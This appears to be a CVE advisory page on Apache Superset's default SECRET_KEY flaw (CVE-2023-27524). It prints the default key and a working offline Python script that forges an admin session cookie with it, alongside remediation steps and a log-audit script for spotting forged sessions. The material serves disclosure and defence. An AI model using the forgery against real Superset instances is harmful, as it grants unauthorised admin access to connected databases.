CVE-2023-27524 — Apache Superset Insecure Default Initialization of Resource Vulnerability

CVE-2023-27524

Apache Superset — Well-Known Default SECRET_KEY Allows Session Cookie Forgery and Admin Takeover; ~3,000 Exposed Instances

What is Apache Superset?

Apache Superset is an open-source business intelligence and data visualization platform originally developed at Airbnb and donated to the Apache Software Foundation. Organizations use it to create dashboards, explore datasets from SQL databases and data warehouses, and share analytics across teams. Superset is deployed both as a self-hosted application and as a managed service. Because Superset directly connects to internal databases and data warehouses — often containing sensitive financial, operational, or customer data — an attacker who achieves admin access to Superset can read and exfiltrate database contents, modify dashboard configurations, and potentially pivot to connected data infrastructure.

Overview

CVE-2023-27524 is an insecure default initialization vulnerability (CWE-1188) in Apache Superset: installations that use the default SECRET_KEY value shipped with the application are vulnerable to session cookie forgery, allowing an unauthenticated attacker to fabricate a valid admin session cookie and access the Superset instance as an administrator. Horizon3.ai researchers discovered approximately 3,000 internet-exposed Superset instances with the default key unchanged. Apache patched the issue in Superset 2.1.0 by raising a startup error if the default key is detected. CISA added CVE-2023-27524 to the KEV catalog in January 2024, nearly nine months after public disclosure.

Affected Versions

Product            Affected                                            Fixed
Apache Superset    Versions prior to 2.1.0 with SECRET_KEY unchanged   Superset 2.1.0+ (startup check)

Note: the vulnerability is not a code defect in a specific version — it affects any version where the operator has not changed SECRET_KEY from the default value documented in Superset's configuration. Upgrading to 2.1.0 helps by refusing to start with the default key, but older versions remain vulnerable until operators change the key.

Technical Details

Apache Superset is built on Flask (through Flask-AppBuilder). Flask's session cookie is not encrypted: it carries the session data as base64url-encoded JSON plus a timestamp, and the only thing that stops a client from writing its own session is an HMAC signature (SHA-1 by default, produced through the itsdangerous library) keyed from SECRET_KEY. When a user logs in, Flask-Login stores that user's id in the session; on every later request the server recomputes the HMAC and, if it matches, trusts the stored id without further checks. An attacker who knows SECRET_KEY can therefore mint a cookie naming any user id, an administrator's included, and the server cannot tell it from one it issued itself. No credentials are ever presented.

Superset's default configuration module, superset/config.py (the file whose values an operator's superset_config.py is meant to override), shipped with the following well-known test key:

SECRET_KEY = '\2\1thisismyscretkey\1\2\e\y\y\h'

This key is publicly visible in Superset's source code and documentation. Any Superset deployment that did not override this value in its production configuration uses a key that any attacker can look up.

Exploitation requires:

  1. Identifying a Superset instance (Shodan, internet scanning)
  2. Crafting a Flask session cookie signed with the default key, claiming administrator identity
  3. Sending the forged cookie to the Superset instance — the server accepts it as a valid admin session

Once authenticated as admin, the attacker can read database connection credentials (stored in Superset for connecting to data warehouses), query connected databases directly through Superset's SQL Lab feature, and access all dashboards and underlying data.

The CVSS S:C (scope changed) reflects that a successful attack affects systems beyond Superset itself — connected databases and data warehouses can be directly queried and exfiltrated.
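
The forgery described in steps 2 and 3, and the reason rotating SECRET_KEY invalidates it, as an added example that is not code from Superset, Flask, itsdangerous or Horizon3.ai. It re-implements with the standard library the scheme Flask uses for its session cookie (base64url JSON payload, base64url timestamp, HMAC-SHA1 whose key is HMAC-SHA1(SECRET_KEY, "cookie-session")), so it runs offline. The session contents {"_user_id": "1"} (Flask-Login's identity claim, with the first admin account commonly id 1) are an assumption about a typical install, not something the page states, and the example only builds and checks the cookie; it never contacts a server.

```python
"""Flask session-cookie forgery and verification, stdlib only.

Added example (not Superset's, Flask's or itsdangerous' own code). Mirrors the
itsdangerous URLSafeTimedSerializer layout Flask uses for the `session` cookie:
payload.timestamp.signature, all base64url without padding.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib

# The same string the shipped config literal evaluates to, written with explicit
# escapes: "\2" and "\1" are octal escapes, "\e" "\y" "\h" stay literal backslashes.
DEFAULT_SECRET_KEY = "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h"
SALT = b"cookie-session"  # Flask's fixed salt for the session serializer


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data):
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _int_to_bytes(num):
    return num.to_bytes((num.bit_length() + 7) // 8, "big")


def _signature(secret_key, value):
    # itsdangerous key_derivation="hmac": the signing key is HMAC(secret, salt)
    key = hmac.new(secret_key.encode("utf-8"), SALT, hashlib.sha1).digest()
    return _b64(hmac.new(key, value, hashlib.sha1).digest())


def forge_session_cookie(secret_key, session, timestamp=None):
    """Build payload.timestamp.signature exactly as Flask would for `session`.

    Anyone holding `secret_key` can do this for any session contents; the
    server has no way to distinguish the result from a cookie it issued.
    """
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode("utf-8")
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:      # itsdangerous compresses only when it pays off
        payload = b"." + _b64(compressed)   # leading "." marks a compressed payload
    else:
        payload = _b64(raw)
    ts = timestamp if timestamp is not None else int(time.time())
    value = payload + b"." + _b64(_int_to_bytes(ts))
    return (value + b"." + _signature(secret_key, value)).decode("ascii")


def verify_session_cookie(secret_key, cookie, max_age=None):
    """Return the session dict if signature (and age) check out, else None."""
    try:
        value, sig = cookie.encode("ascii").rsplit(b".", 1)
        payload, ts = value.rsplit(b".", 1)
    except ValueError:
        return None
    if not hmac.compare_digest(sig, _signature(secret_key, value)):
        return None                          # wrong key or tampered cookie
    issued = int.from_bytes(_b64d(ts), "big")
    if max_age is not None and time.time() - issued > max_age:
        return None
    raw = zlib.decompress(_b64d(payload[1:])) if payload.startswith(b".") else _b64d(payload)
    return json.loads(raw)


if __name__ == "__main__":
    forged = forge_session_cookie(DEFAULT_SECRET_KEY, {"_user_id": "1"})
    print("forged cookie:", forged)
    print("accepted with default key:", verify_session_cookie(DEFAULT_SECRET_KEY, forged))
    print("accepted after key rotation:", verify_session_cookie("rotated", forged))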

Discovery

Horizon3.ai security researchers identified the default SECRET_KEY issue and published their findings in April 2023. Their internet scan discovered approximately 3,000 Superset instances accessible from the public internet with the default key unchanged — representing a large pool of immediately compromisable administrative interfaces. The Apache Software Foundation coordinated disclosure and released the fix in Superset 2.1.0.

Exploitation Context

Insecure defaults in business intelligence and analytics platforms are particularly high-value because BI tools are specifically designed to aggregate and present sensitive data from across an organization's data infrastructure. An attacker who gains admin access to Superset immediately has a query interface into every database Superset is connected to — often including data warehouses, operational databases, and financial systems. The nine-month gap between April 2023 disclosure and January 2024 KEV addition suggests that exploitation was confirmed through incident response investigations, likely targeting Superset deployments in enterprise environments.

Remediation

  1. Change the SECRET_KEY immediately: generate a strong random value (e.g. openssl rand -base64 42) and set it in superset_config.py before restarting. All existing sessions are invalidated and users must log in again. Superset also uses SECRET_KEY to encrypt stored database connection passwords, so follow the documented rotation procedure (keep the old value as PREVIOUS_SECRET_KEY next to the new SECRET_KEY and run superset re-encrypt-secrets); otherwise the stored connection secrets become unreadable after the change.
  2. Upgrade to Apache Superset 2.1.0 or later: the startup check refuses to launch with the default key, preventing a repeat of the misconfiguration. The check only recognises the shipped default; a key copied from a tutorial, committed to a public repository or shared across environments is just as forgeable and must also be replaced.
  3. Audit for admin activity that was never preceded by a login. A forged cookie is never exchanged for credentials, so there is no login event to find: look instead for requests to SQL Lab, database-connection and security endpoints from client addresses or at times with no matching POST to the login form, and compare Superset's own action log (the logs table, which records the acting user id) against ab_user.last_login and login_count, which only move on a real login.
  4. Restrict Superset to internal networks — Superset admin interfaces should not be accessible from the internet; place them behind a VPN or internal-only network boundary.
  5. Review database connection credentials stored in Superset — if the default key was in use, assume attackers may have exfiltrated stored credentials and rotate database passwords for all connected data sources.
  6. Audit connected database activity for unexpected queries originating from the Superset service account during the exposure window.
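
The access-log check in remediation step 3, as an added example that is not part of the original page or of Superset. It runs a heuristic over constructed combined-format (gunicorn/nginx style) access-log lines: a client that makes successful admin-level calls without an earlier successful POST to /login/ (Flask-AppBuilder answers a good login with a 302) is flagged. The log format, the endpoint prefixes treated as admin-only and the sample lines are all assumptions made for the example.

```python
"""Flag admin-level Superset requests from clients that never logged in.

Added example, not Superset's own tooling. Heuristic over web-server access
logs; the endpoint prefixes and the sample lines below are assumptions.
"""
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})\b'
)

# Endpoints a dashboard viewer has no business calling; assumed for this example.
ADMIN_PREFIXES = (
    "/api/v1/database/",
    "/api/v1/sqllab/",
    "/sqllab/",
    "/superset/sqllab/",
    "/api/v1/security/",
)

# Constructed sample: a forged-cookie session from 203.0.113.42 (admin calls,
# no login), an unauthenticated probe from 198.51.100.7 (401), and a real
# login followed by admin activity from 10.0.0.5.
SAMPLE_LOG = """\
203.0.113.42 - - [10/Jan/2024:02:13:55 +0000] "GET /api/v1/database/ HTTP/1.1" 200 2210 "-" "python-requests/2.31"
203.0.113.42 - - [10/Jan/2024:02:14:02 +0000] "POST /api/v1/sqllab/execute/ HTTP/1.1" 200 8801 "-" "python-requests/2.31"
198.51.100.7 - - [10/Jan/2024:03:00:00 +0000] "GET /api/v1/database/ HTTP/1.1" 401 41 "-" "curl/8.4"
10.0.0.5 - - [10/Jan/2024:09:00:01 +0000] "GET /login/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2024:09:00:07 +0000] "POST /login/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2024:09:00:08 +0000] "GET /api/v1/database/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return dict(ip, ts, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_unauthenticated_admin_activity(lines):
    """Return (ip, ts, path) for successful admin calls by clients with no prior login."""
    logged_in = set()
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec["ip"], rec["path"], rec["status"]
        if rec["method"] == "POST" and path.startswith("/login/") and status in (302, 303):
            logged_in.add(ip)             # credentials were actually presented
            continue
        if status == 200 and path.startswith(ADMIN_PREFIXES) and ip not in logged_in:
            findings.append((ip, rec["ts"], path))
    return findings


def audit_sample():
    return find_unauthenticated_admin_activity(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, ts, path in audit_sample():
        print(f"{ts} {ip} {path}  <- admin call without a login")
```

Treat hits as leads, not verdicts: clients behind a shared NAT address, or sessions that began before the start of the log window, will show up without a login line. Run it over the whole exposure window, not just the last rotation, and follow up each lead in Superset's action log.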

Key Details

Property               Value
CVE ID                 CVE-2023-27524
Vendor / Product       Apache — Superset
NVD Published          2023-04-24
NVD Last Modified      2026-02-26
CVSS 3.1 Score         8.9
CVSS 3.1 Vector        CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
Severity               HIGH
CWE                    CWE-1188
CISA KEV Added         2024-01-08
CISA KEV Deadline      2024-01-29
Known Ransomware Use   No

CVSS 3.1 Breakdown

Attack Vector:        Network
Attack Complexity:    High
Privileges Required:  None
User Interaction:     None
Scope:                Changed
Confidentiality:      High
Integrity:            High
Availability:         Low

Required Action

CISA BOD 22-01 Deadline: 2024-01-29. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

Date         Event
2023-04-24   CVE-2023-27524 published; Apache Superset 2.1.0 released, adding a startup check that errors if the default SECRET_KEY is unchanged
2023-04      Horizon3.ai publishes research identifying approximately 3,000 internet-exposed Superset instances still using the default SECRET_KEY
2024-01-08   Added to CISA Known Exploited Vulnerabilities catalog
2024-01-29   CISA BOD 22-01 remediation deadline

References

Resource                                     Type
Apache Security Advisory — CVE-2023-27524    Vendor Advisory
NVD — CVE-2023-27524                         Vulnerability Database
CISA KEV Catalog Entry                       US Government